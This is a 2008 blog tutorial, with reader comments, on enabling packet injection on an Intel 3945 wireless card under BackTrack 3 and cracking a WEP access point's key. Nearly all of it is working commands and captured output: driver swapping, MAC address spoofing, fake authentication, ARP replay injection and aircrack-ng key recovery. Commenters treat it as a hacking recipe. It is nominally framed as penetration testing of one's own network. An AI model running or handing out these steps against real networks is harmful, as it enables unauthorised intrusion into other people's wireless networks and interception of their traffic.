Intel 3945 Injection & Fixes For Aircrack-ng BT3

Posted: Sunday,July 6, 2008 in Wifi-Hacking
Tags: , , , , , , , ,

remove old aircrack-ng 0.9 or whatever version you have
bt ~ #make uninstall

bt ~ #svn co aircrack-ng
bt ~ #cd aircrack-ng
bt aircrack-ng #gmake SQLITE=true
bt aircrack-ng #gmake SQLITE=true install

bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Managed Channel:0 Access Point: Not-Associated
Tx-Power=0 dBm
Retry min limit:7 RTS thr:off Fragment thr=2346 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

bt ~ #modprobe -r iwl3945
bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

bt ~ #modprobe ipwraw

bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wifi0 unassociated ESSID:off/any
Mode:Monitor Channel=1 Bit Rate=54 Mb/s

rtap0 no wireless extensions.

here you have enabled your intel3945 NIC to do discovery/injetion and penetration testing

bt ~ #ifconfig wifi0 down
bt ~ # macchanger –mac 00:10:20:30:40:50 wifi0
Current MAC: 00:ab:ab:ab:ab:ab (unknown)
Faked MAC: 00:10:20:30:40:50 (Welch Allyn, Data Collection)
mac spoofing for security. upto u :)
bt ~ #ifconfig wifi0 up
bt ~ # ifconfig wifi0
wifi0 Link encap:UNSPEC HWaddr 00-10-20-30-40-50-D8-54-00-00-00-00-00-00-00-00
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:108 (108.0 b)
Interrupt:19 Base address:0x6000 Memory:f4300000-f4300fff
bt ~ # airmon-ng start wifi0

Interface Chipset Driver

wifi0 Centrino a/b/g ipwraw-ng (monitor mode enabled)

bt ~ #airodump-ng wifi0

get the SSID of your network AP
and stop using ctrl+c because we dont want to unnecessariliy capture other ap’s data.

bt ~ # airodump-ng -c 11 -w pentest –bssid 00:08:5C:7B:9E:B5 wifi0
(let the airodump window keep running to capture enough packets)

CH 11 ][ Elapsed: 9 mins ][ 2008-02-20 13:43


00:08:5C:7B:9E:B5 0 100 4537 54723 0 11 54 WEP WEP OPN Narayan-sivenara

BSSID STATION PWR Rate Lost Packets Probes

00:08:5C:7B:9E:B5 00:10:20:30:40:50 0 0- 0 0 73393

bt ~ # aireplay-ng -1 0 -a 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
13:35:08 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11

13:35:08 Sending Authentication Request (Open System) [ACK]
13:35:08 Authentication successful
13:35:08 Sending Association Request [ACK]
13:35:08 Association successful :-)

bt ~ # aireplay-ng -3 -b 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
13:35:56 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11
Saving ARP requests in replay_arp-0220-133556.cap
You should also start airodump-ng to capture replies.
Read 129275 packets (got 54575 ARP requests and 70947 ACKs), sent 83561 packets…(499 pps)

bt ~ # aircrack-ng -n 64 –bssid 00:08:5C:7B:9E:B5 pentest-01.cap
Opening pentest-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 54722 ivs.
KEY FOUND! [ 98:45:00:88:57 ]
Decrypted correctly: 100%

I hope this tutorial will help all the people having Intel3945 NIC for penetration testing and vulnerability test.thanks a lot to exploitz for making such wonderful tutorials and videos.if any mistake you found please let me know I will correct it.I am happy to be a proud member of this so full of knowledge forum with lots of tutorial.
Tested On:
My laptop Specification
compaq presario v3000(v3607TU)
Dual Core 1.6 GHz With 1 MB L2 Cache
Intel 956GM Chipset
120 GB HDD
4 GB Transcend DDR2 667 MHz RAM
Intel X3100 PCI-E
Running OS.Backtrack 3 Beta Dual Boot With Windows Vista
Vmware on Vista Running OS:Windows Server 2003 Enterprise Edition With IIS 6.0/ADS,Windows Xp Professional with SP3 latest updated,Sun Solaris 10,BackTrack 3

My Computer Specification
Pentium 4 1.7 GHz PGA 478 socket
Intel 850 MB orignal MB
1 GB RDRAM PC800 Samsung
200 GB HDD IDE Segate Baracuda 7200 RPM 160 GB + Segate Baracuda 5400 RPM 40 GB
Asus Geforce 2 GTS 128 MB AGP 4x
Running OS Windows XP Pro With SP3 ,Dual Boot With BT 3 Beta karnel

Here are proofs

Orignal post by me at Remote-exploit forums:

  1. lee says:

    hi this is a brilliant tutorial after searching what seemed like forever for my injection settings for dell this is a god send…onr question though,after you have finished your hack how do you re enable your wlan0 settings again from wifi0?? (return to managed mode via wlan0)

  2. tomek says:

    Hey, great article. Some pictures do not work this time though, but they worked when I was here last time. For anyone interested, I am sharing a link to this tutorial that helped me too, they have pictures too.

    How to crack WEP with Intel PRO/Wireless 3945ABG

    How to crack WEP encryption (wifi security)

  3. koolkat says:

    i’m running my system on WinXP. Is it possible for me? If I could where could i find the driver for my Intel3945 card? Thanks

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s